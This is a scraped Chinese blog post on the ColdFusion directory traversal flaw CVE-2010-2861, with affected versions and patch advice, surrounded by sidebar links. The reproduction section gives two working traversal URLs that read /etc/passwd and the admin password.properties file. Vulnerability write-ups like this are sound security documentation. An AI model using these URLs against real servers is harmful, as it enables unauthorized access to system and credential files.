当前位置:网站首页>coldfusion文件读取漏洞(CVE-2010-2861)
coldfusion文件读取漏洞(CVE-2010-2861)
2022-07-31 01:32:00 【1stPeak】
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。
漏洞描述
CVE-2010-2861
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
漏洞影响
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
漏洞复现
1、直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可读取文件/etc/passwd
2、读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
解密password
漏洞修复
打补丁、升级版本
边栏推荐
- Jetpack Compose学习(8)——State及remeber
- typescript11 - data types
- PDF split/merge
- Kyushu cloud as cloud computing standardization excellent member unit
- The level of ShardingSphere depots in actual combat (4)
- MySql的安装配置超详细教程与简单的建库建表方法
- ros2知识:在单个进程中布置多个节点
- 程序员转正述职报告/总结
- 1782. Count the number of point pairs Double pointer
- 蛮力法/邻接表 广度优先 有向带权图 无向带权图
猜你喜欢
Responsive layout vs px/em/rem
1782. 统计点对的数目 双指针
typescript9 - common base types
ECCV 2022丨轻量级模型架构火了,力压苹果MobileViT(附代码和论文下载)
Teach you how to configure Jenkins automated email notifications
剑指offer17---打印从1到最大的n位数
The difference between 4G communication module CAT1 and CAT4
仿牛客网项目总结
想要写出好的测试用例,先要学会测试设计
蓝牙mesh系统开发二 mesh节点开发
随机推荐
Word/Excel 固定表格大小,填写内容时,表格不随单元格内容变化
Xiaohei's leetcode journey: 117. Fill the next right node pointer of each node II
What have I experienced when I won the offer of BAT and TMD technical experts?
The level of ShardingSphere depots in actual combat (4)
typescript17 - function optional parameters
Jetpack Compose学习(8)——State及remeber
link与@import的区别
16、注册中心-consul
黄东旭:TiDB的优势是什么?
蓝牙mesh系统开发二 mesh节点开发
打印任务排序 js od华为
【flask入门系列】Flask-SQLAlchemy的使用
分布式.分布式锁
Mysql:Invalid default value for TIMESTAMP
PDF 拆分/合并
有没有可以做副业可以日入300元方法?
ros2知识:在单个进程中布置多个节点
Huawei's "genius boy" Zhihui Jun has made a new work, creating a "customized" smart keyboard from scratch
蛮力法/邻接矩阵 广度优先 有向带权图 无向带权图
Distributed. Distributed lock